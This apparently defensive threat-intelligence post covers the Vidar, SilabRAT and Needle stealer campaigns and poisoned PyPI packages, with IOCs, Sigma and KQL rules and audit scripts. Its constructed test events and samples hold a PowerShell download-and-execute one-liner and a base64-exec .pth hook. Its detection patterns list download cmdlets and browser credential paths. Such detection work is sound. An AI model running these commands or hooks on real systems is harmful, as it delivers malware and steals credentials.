
Vidar, SilabRAT & Needle C2: Multi-Vector Credential Theft Campaigns Targeting Devs and End Users

Security Arsenal Team
June 12, 2026

Recent OTX Pulse data indicates a convergence of credential theft tactics that combine social engineering, Malware-as-a-Service (MaaS), and software supply chain compromise. Threat actors, specifically Storm-3075 and o1oo1, are actively deploying infostealers such as Vidar, Lumma, and the new SilabRAT to harvest credentials, cryptocurrency wallets, and browser session data.

The attack chains are diverse:

  1. Social Engineering: Impersonating AI brands (ChatGPT, Copilot) and distributing fake software tutorials via TikTok/Instagram to trick users into running PowerShell scripts that drop Vidar.
  2. Supply Chain: Compromising PyPI and npm repositories (packages: Hades, Mini Shai-Hulud, Miasma) to target developers and bioinformatics sectors via malicious .whl wheel files.
  3. MaaS Proliferation: SilabRAT and Needle C2 are being sold on the dark web, offering advanced features like HVNC (Hidden Virtual Network Computing) and browser extension spoofing to bypass MFA.

The primary objective across all pulses is financial fraud via credential harvesting and cryptocurrency theft, facilitated by session hijacking and browser profile cloning.

Threat Actor / Malware Profile

Malware Families

  • Vidar Stealer & Lumma Stealer: Distributed via HijackLoader and social engineering lures (AI hype, TikTok tutorials). They focus on stealing cryptocurrency wallets, browser cookies, and 2FA credentials. Payloads are typically fetched by PowerShell commands that the victim is talked into running.
  • SilabRAT (Author: o1oo1): A $5,000/month MaaS offering. It features HVNC for remote control that is invisible to the logged-in user, and browser profile cloning (copying whole Firefox/Chrome profiles) so that stolen sessions replay with the victim's cookies and saved logins rather than tripping session protections. It is packaged with HijackLoader and AsmCrypt for loading and obfuscation.
  • Needle (ThreatNeedle/RustyStealer): A modular crypto-stealing platform. It employs a browser extension spoofer (targeting MetaMask, Phantom) and a Rust-based desktop agent impersonating Exodus/Ledger. Notably, its C2 keys were left hardcoded in the malware binary.
  • Hades / Miasma / Mini Shai-Hulud: Worms targeting developers via malicious PyPI packages. They use trojanized native .abi3.so extensions and executable .pth hooks for persistence. Note that site.py executes any .pth line that begins with "import" when the interpreter starts, so the hook runs on every Python launch, not only when the package is imported.
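The .pth hook and native-extension tricks above leave artifacts that can be audited offline. The script below is an added example, not code from the Security Arsenal page or from the malware: it walks a site-packages directory, reports every .pth line that site.py would execute at interpreter start (flagging lines that use exec/base64/subprocess-style constructs that a normal editable-install hook does not need), and lists native extension modules so a responder can check their provenance. The sample tree it builds is constructed here; the names demo_pkg and _native are made up.

```python
"""Audit a site-packages directory for the persistence mechanisms described
above: .pth files whose lines site.py will execute at interpreter start, and
native extension modules shipped inside a wheel. Added example, not code from
the Security Arsenal page or from the malware; the sample tree it builds is
constructed here and its names (demo_pkg, _native) are made up."""
import os
import re
import site
import tempfile
from pathlib import Path

# site.py runs any .pth line that starts with "import " or "import\t" at every
# interpreter start, whether or not the package is ever imported. Plain path
# entries are the benign case.
EXEC_LINE = re.compile(r"^import[ \t]")
# Constructs that legitimate editable-install hooks do not need
SUSPICIOUS = re.compile(
    r"exec\(|eval\(|base64|marshal|compile\(|subprocess|os\.system|socket|urllib|\\x[0-9a-fA-F]{2}")
NATIVE_SUFFIXES = (".so", ".pyd", ".dylib")   # covers *.abi3.so and *.cpython-*.so


def scan_pth_hooks(site_packages):
    """Return (file, line_no, line, suspicious) for every executable .pth line."""
    findings = []
    for pth in sorted(Path(site_packages).glob("*.pth")):
        for no, line in enumerate(pth.read_text(errors="replace").splitlines(), 1):
            if EXEC_LINE.match(line):
                findings.append((pth.name, no, line.strip(), bool(SUSPICIOUS.search(line))))
    return findings


def list_native_extensions(site_packages):
    """Return POSIX-style relative paths of native extension modules under site-packages."""
    root = Path(site_packages)
    return sorted(p.relative_to(root).as_posix()
                  for p in root.rglob("*") if p.is_file() and p.suffix in NATIVE_SUFFIXES)


def audit(site_packages):
    hooks = scan_pth_hooks(site_packages)
    return {
        "executable_pth": hooks,
        "suspicious_pth": [h for h in hooks if h[3]],
        "native_extensions": list_native_extensions(site_packages),
    }


def build_sample_site_packages(base):
    """Constructed tree: a benign path-only .pth, a hooked .pth that decodes and
    execs a payload (the payload here is just print('hi')), and a native extension."""
    sp = Path(base) / "site-packages"
    (sp / "demo_pkg").mkdir(parents=True)
    (sp / "benign_path.pth").write_text("/home/dev/src/benign_project\n")
    (sp / "demo_pkg-0.1.0.pth").write_text(
        "import base64; exec(base64.b64decode(b'cHJpbnQoJ2hpJyk='))\n")
    (sp / "demo_pkg" / "_native.abi3.so").write_bytes(b"\x7fELF" + b"\x00" * 12)
    return sp


def demo():
    """Build the constructed tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_site_packages(tmp))


if __name__ == "__main__":
    print("constructed sample:", demo())
    # Then the interpreter's own site-packages, which is what a responder
    # would actually run this against on a developer workstation.
    for sp in getattr(site, "getsitepackages", lambda: [])() + [site.getusersitepackages()]:
        if os.path.isdir(sp):
            for name, no, line, bad in scan_pth_hooks(sp):
                print(f"{'[!]' if bad else '[ ]'} {sp}/{name}:{no}: {line}")
```

Expect executable .pth lines from legitimate editable installs (setuptools and pip write `__editable__` hooks that begin with `import`); the suspicious flag is what separates those from a hook that decodes and executes a payload. Native extensions are not malicious by themselves, but any that do not belong to a package you deliberately installed deserve a hash check against the distribution.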

Distribution Methods

  • Phishing & Malvertising: SEO poisoning and fake ads for AI tools.
  • Social Media: TikTok and Instagram Reels hosting fake "software unlock" tutorials.
  • Supply Chain: Typosquatting and package confusion attacks on Python (PyPI) and Node.js (npm) registries.
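Typosquatting and package confusion are caught most cheaply before installation, at the manifest. The following is an added example, not code from the page: it parses a requirements.txt, normalises names the way PyPI does (PEP 503), blocks the package names this page associates with the Hades, Mini Shai-Hulud and Miasma campaigns, and flags requirements within a small edit distance of packages the team actually trusts. The trusted list and the sample manifest are constructed for the demonstration.

```python
"""Pre-install review of a requirements.txt against the package names this page
attributes to the Hades / Mini Shai-Hulud / Miasma campaigns, plus an
edit-distance check for typosquats of packages the team depends on.
Added example, not from the page; the trusted list and manifest are constructed."""
import re

KNOWN_MALICIOUS = {"hadesbio", "miasma", "minishaihulud"}      # names given on this page
# Constructed allowlist: what a bioinformatics team might legitimately pin.
TRUSTED = {"numpy", "pandas", "scipy", "requests", "biopython", "matplotlib"}


def normalize(name):
    """PEP 503 name normalisation: case-fold and collapse runs of . _ - into '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a, b):
    """Plain edit distance; inputs are package names, so speed is irrelevant."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_requirement(line):
    """Return the normalised project name from one requirements line, or None."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("-", "git+", "http")):
        return None
    m = re.match(r"^[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return normalize(m.group(0)) if m else None


def check_requirements(text):
    """Return (line_no, name, reason) for every requirement that needs a look."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        name = parse_requirement(raw)
        if name is None or name in TRUSTED:
            continue
        if name in KNOWN_MALICIOUS:
            findings.append((no, name, "known-malicious"))
            continue
        for trusted in sorted(TRUSTED):
            # allow 1 edit for short names, 2 for longer ones
            if levenshtein(name, trusted) <= max(1, len(trusted) // 4):
                findings.append((no, name, f"typosquat candidate for {trusted}"))
                break
    return findings


# Constructed manifest: one typo of a trusted package and two blocklisted names
SAMPLE_REQUIREMENTS = """\
numpy==1.26.4
requets>=2.31          # one letter short of requests
biopython
minishaihulud
hadesbio
"""

if __name__ == "__main__":
    for no, name, reason in check_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {no}: {name}: {reason}")
```

The edit-distance threshold is deliberately tight; typosquats that add a suffix (`requests-utils`) or swap a separator are better caught by comparing against the full list of names your organisation publishes internally, which is the package confusion case.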

IOC Analysis

The provided indicators include:

  • Domains: brokeapt.com, msget.run, d4ug.site (Used in Vidar distribution).
  • IP Addresses: 91.199.163.124 (SilabRAT C2).
  • File Hashes (SHA1/SHA256): Multiple hashes associated with loaders, RATs, and malicious python wheels.

Operational Guidance: SOC teams should immediately block the listed domains and IPs at the perimeter firewall and proxy. Load the file hashes into the EDR as custom indicators so that execution, not merely presence, raises an alert. PowerShell launched with a download-and-execute command line (the pattern the TikTok Vidar tutorials instruct victims to paste) or spawned by an unsigned binary should trigger high-severity alerts. Hash matching will miss the next repacked payload, so the behavioural rules that follow matter more than the hash list.

Detection Engineering

Sigma Rules

YAML
title: Potential Vidar Stealer PowerShell Execution
description: Detects PowerShell command lines seen in Vidar distribution campaigns spread via social media tutorials, either referencing the known distribution domains or combining a download/evaluate cmdlet with a URL on the .run, .site or .xyz TLDs. A bare ".run" substring would also match ".runtime", so the TLD check requires a URL.
references:
  - https://otx.alienvault.com/pulse/6666b96a774f67622155207a
author: Security Arsenal
date: 2026/06/13
modified: 2026/06/13
tags:
  - attack.execution
  - attack.t1059.001
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection_ps:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_ioc:
    CommandLine|contains:
      - 'brokeapt.com'
      - 'msget.run'
      - 'd4ug.site'
  selection_download:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'iwr '
      - 'DownloadString'
      - 'DownloadFile'
      - 'Invoke-Expression'
      - 'IEX'
  selection_tlds:
    CommandLine|re: 'https?://[^ ]+\.(run|site|xyz)(/|$|[''"])'
  condition: selection_ps and (selection_ioc or (selection_download and selection_tlds))
falsepositives:
  - Legitimate system administration scripts that download from hosts on these TLDs
level: high
---
title: SilabRAT Browser Profile Cloning Activity
description: Detects processes other than the browser itself reading browser profile data (Chrome "User Data", Firefox profiles, Opera), which is indicative of SilabRAT or other infostealers cloning a profile to hijack sessions. Needs a file-access telemetry source such as the Windows kernel file ETW provider; Sysmon does not log ordinary file reads.
references:
  - https://otx.alienvault.com/pulse/66683c91774f676221552338
author: Security Arsenal
date: 2026/06/13
tags:
  - attack.collection
  - attack.t1005
  - attack.credential_access
  - attack.t1539
status: experimental
logsource:
  product: windows
  category: file_access
detection:
  selection:
    TargetFilename|contains:
      - '\AppData\Local\Google\Chrome\User Data\'
      - '\AppData\Local\Mozilla\Firefox\Profiles\'
      - '\AppData\Roaming\Opera Software\Opera Stable\'
  filter_browser:
    Image|endswith:
      - '\Google\Chrome\Application\chrome.exe'
      - '\Mozilla Firefox\firefox.exe'
      - '\Opera\opera.exe'
  condition: selection and not filter_browser
falsepositives:
  - Backup software
  - Browser migration tools
  - Browser helper processes (crash handlers, updaters); tune the filter to the full install paths used in your estate rather than bare executable names, since a stealer can simply call itself chrome.exe
level: high
---
title: Malicious PyPI Package Installation
description: Detects pip (or python -m pip) installing the package names associated with the Hades, Mini Shai-Hulud, and Miasma campaigns targeting bioinformatics developers. Process creation telemetry cannot see an import inside a script, so the install command line is the observable event.
references:
  - https://otx.alienvault.com/pulse/6667219d774f676221552119
author: Security Arsenal
date: 2026/06/13
tags:
  - attack.initial_access
  - attack.t1195.002
status: experimental
logsource:
  product: linux
  category: process_creation
detection:
  selection_img:
    Image|endswith:
      - '/pip'
      - '/pip3'
      - '/python'
      - '/python3'
  selection_install:
    CommandLine|contains: 'install'
  selection_pkg:
    CommandLine|contains:
      - 'minishaihulud'
      - 'miasma'
      - 'hadesbio'
  condition: all of selection_*
falsepositives:
  - Legitimate development testing (unlikely unless intentionally using malicious names)
  - "miasma" is an ordinary English word and may appear in unrelated arguments; confirm the token is the package name
level: critical
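Before a rule goes into the SIEM it is worth running its logic over a handful of events you know the answer for. The block below is an added example, not code from the page: it reimplements the matching of the three Sigma rules in this section (case-insensitive substring matching as Sigma does it, with the TLD check tightened to a URL) as plain functions and runs them over constructed process-creation and file-access records, including near misses that should not fire. All event records are made up for the demonstration.

```python
"""Run the logic of the three Sigma rules above over constructed events so the
matching can be checked before the rules are deployed to a SIEM. Added example,
not code from the Security Arsenal page; every event record below is made up."""
import re

VIDAR_DOMAINS = ("brokeapt.com", "msget.run", "d4ug.site")
DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                   "invoke-expression", "iex")
# A URL on one of the TLDs abused in the campaign, ending at a path, a quote or end of line
SUSPICIOUS_URL = re.compile(r"""https?://[^ ]+\.(run|site|xyz)(/|$|['"])""", re.IGNORECASE)
BROWSER_PROFILE_PATHS = ("\\appdata\\local\\google\\chrome\\user data\\",
                         "\\appdata\\local\\mozilla\\firefox\\profiles\\",
                         "\\appdata\\roaming\\opera software\\opera stable\\")
BROWSER_IMAGES = ("\\google\\chrome\\application\\chrome.exe",
                  "\\mozilla firefox\\firefox.exe",
                  "\\opera\\opera.exe")
MALICIOUS_PKGS = ("minishaihulud", "miasma", "hadesbio")
PY_IMAGES = ("/pip", "/pip3", "/python", "/python3")


def rule_vidar_powershell(ev):
    """selection_ps and (selection_ioc or (selection_download and selection_tlds))"""
    if ev.get("category") != "process_creation":
        return False
    image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return False
    has_ioc = any(d in cmd for d in VIDAR_DOMAINS)
    has_download = any(t in cmd for t in DOWNLOAD_TOKENS)
    return has_ioc or (has_download and SUSPICIOUS_URL.search(cmd) is not None)


def rule_browser_profile_clone(ev):
    """selection and not filter_browser"""
    if ev.get("category") != "file_access":
        return False
    image, target = ev.get("Image", "").lower(), ev.get("TargetFilename", "").lower()
    return any(p in target for p in BROWSER_PROFILE_PATHS) and not image.endswith(BROWSER_IMAGES)


def rule_malicious_pypi_install(ev):
    """all of selection_* : interpreter/pip image, 'install', and a blocklisted name"""
    if ev.get("category") != "process_creation":
        return False
    image, cmd = ev.get("Image", "").lower(), ev.get("CommandLine", "").lower()
    return image.endswith(PY_IMAGES) and "install" in cmd and any(p in cmd for p in MALICIOUS_PKGS)


RULES = {
    "Potential Vidar Stealer PowerShell Execution": rule_vidar_powershell,
    "SilabRAT Browser Profile Cloning Activity": rule_browser_profile_clone,
    "Malicious PyPI Package Installation": rule_malicious_pypi_install,
}


def run_rules(events):
    """Return [(event_index, rule_title)] for every rule that fires on each event."""
    return [(i, title) for i, ev in enumerate(events) for title, fn in RULES.items() if fn(ev)]


# Constructed events: three true positives interleaved with three benign near misses
SAMPLE_EVENTS = [
    # 0: victim pasted a tutorial one-liner that fetches and evaluates a script
    {"category": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://msget.run/x' -UseBasicParsing)\""},
    # 1: admin script: download verb, but a .com host and no IOC domain
    {"category": "process_creation",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c \"Invoke-WebRequest https://intranet.example.com/pkg.zip -OutFile pkg.zip\""},
    # 2: binary in Temp reading the Chrome login database
    {"category": "file_access",
     "Image": "C:\\Users\\dev\\AppData\\Local\\Temp\\svchost.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    # 3: Chrome itself touching its own profile, filtered by install path
    {"category": "file_access",
     "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "TargetFilename": "C:\\Users\\dev\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"},
    # 4: developer installing one of the campaign's package names via python -m pip
    {"category": "process_creation", "Image": "/usr/bin/python3",
     "CommandLine": "python3 -m pip install hadesbio"},
    # 5: ordinary install
    {"category": "process_creation", "Image": "/usr/bin/pip3",
     "CommandLine": "pip3 install numpy pandas"},
]

if __name__ == "__main__":
    for idx, title in run_rules(SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```

Events 1, 3 and 5 are the ones to keep an eye on when tuning: if your own telemetry shows Chrome installed outside Program Files, or your deployment scripts use hosts on the .xyz TLD, the filters need adjusting before the rules are enabled at the levels set above.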

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for PowerShell download-and-execute command lines and Vidar distribution domains
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| extend HasIoC = ProcessCommandLine has_any ("brokeapt.com", "msget.run", "d4ug.site")
| extend HasDownload = ProcessCommandLine has_any ("Invoke-WebRequest", "iwr", "DownloadString", "DownloadFile", "Invoke-Expression", "iex")
// require a URL on the abused TLDs so that ".run" does not match ".runtime"
| extend HasSuspiciousTld = ProcessCommandLine matches regex @"https?://[^ ]+\.(run|site|xyz)(/|$|['""])"
| where HasIoC or (HasDownload and HasSuspiciousTld)
| extend IoCMatch = iff(HasIoC, "Vidar distribution domain", "PowerShell suspicious download")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, IoCMatch

// Hunt for network connections to the SilabRAT C2 IP or the Vidar distribution domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP == "91.199.163.124"
    or RemoteUrl has_any ("brokeapt.com", "msget.run", "d4ug.site")
| extend IoCMatch = iff(RemoteIP == "91.199.163.124", "SilabRAT C2 Connection", "Vidar distribution domain")
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine, IoCMatch

PowerShell Hunt Script

PowerShell
# IOC Hunt for Vidar and SilabRAT Artifacts
# Run elevated: scheduled tasks and TCP connections of other sessions are only visible as admin

Write-Host "[+] Hunting for Vidar/SilabRAT artifacts..." -ForegroundColor Cyan

$MaliciousDomains = @("brokeapt.com", "msget.run", "d4ug.site", "rongtv.xyz", "ssffaa19.xyz")
$C2Ip = "91.199.163.124"

# 1. Hosts file: loaders sometimes pin distribution domains here
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    # -SimpleMatch treats the domain as literal text; as a regex the dot would match any character
    Get-Content $HostsPath | Select-String -SimpleMatch -Pattern $MaliciousDomains | ForEach-Object {
        Write-Host "[!] ALERT: Malicious domain found in hosts file: $($_.Line.Trim())" -ForegroundColor Red
    }
}

# 2. Scheduled tasks whose action launches PowerShell with a URL (common loader persistence).
#    Matching on task names containing "Update" is far too noisy; match the action instead.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if ($action.Execute -match 'powershell|pwsh' -and $action.Arguments -match 'https?://') {
            Write-Host "[!] Suspicious Scheduled Task: $($task.TaskPath)$($task.TaskName)" -ForegroundColor Yellow
            Write-Host "    Action: $($action.Execute) $($action.Arguments)" -ForegroundColor Gray
        }
    }
}

# 3. Script blocks from the last 7 days that reference the IOC domains
#    (Event ID 4104; only present if Script Block Logging is enabled)
$DomainRegex = ($MaliciousDomains | ForEach-Object { [regex]::Escape($_) }) -join '|'
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $DomainRegex } | ForEach-Object {
    Write-Host "[!] ALERT: Script block referencing an IOC domain at $($_.TimeCreated)" -ForegroundColor Red
}

# 4. Active connections to the SilabRAT C2, with the owning process
Get-NetTCPConnection -RemoteAddress $C2Ip -ErrorAction SilentlyContinue | ForEach-Object {
    $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] ALERT: Active connection to SilabRAT C2 $C2Ip from PID $($_.OwningProcess) ($($proc.ProcessName))" -ForegroundColor Red
}

Write-Host "[+] Hunt complete."

Response Priorities

  • Immediate: Block all IOCs (IP 91.199.163.124; domains brokeapt.com, msget.run, d4ug.site) at the perimeter. Isolate endpoints whose PowerShell command lines match the TikTok tutorial pattern (download-and-execute one-liners pointing at the listed domains or at .run/.site/.xyz hosts).
  • 24h: Reset credentials and invalidate sessions for users in high-risk sectors (Technology, Finance) who may have been exposed to the Vidar or SilabRAT campaigns, particularly those with crypto-wallet access. Because these stealers take cookies and session tokens, a password change alone does not evict the attacker: revoke refresh tokens and active sessions in the identity provider as well.
  • 1 Week: Audit all Python and npm package dependencies in development environments, including .pth files and native extensions already present in installed site-packages. Apply application control (AppLocker or WDAC) so that PowerShell on standard-user workstations runs only signed or approved scripts, and enable PowerShell script block logging so that pasted one-liners are recorded. Roll out security awareness training focused on AI-themed phishing and "too good to be true" software cracks on social media.
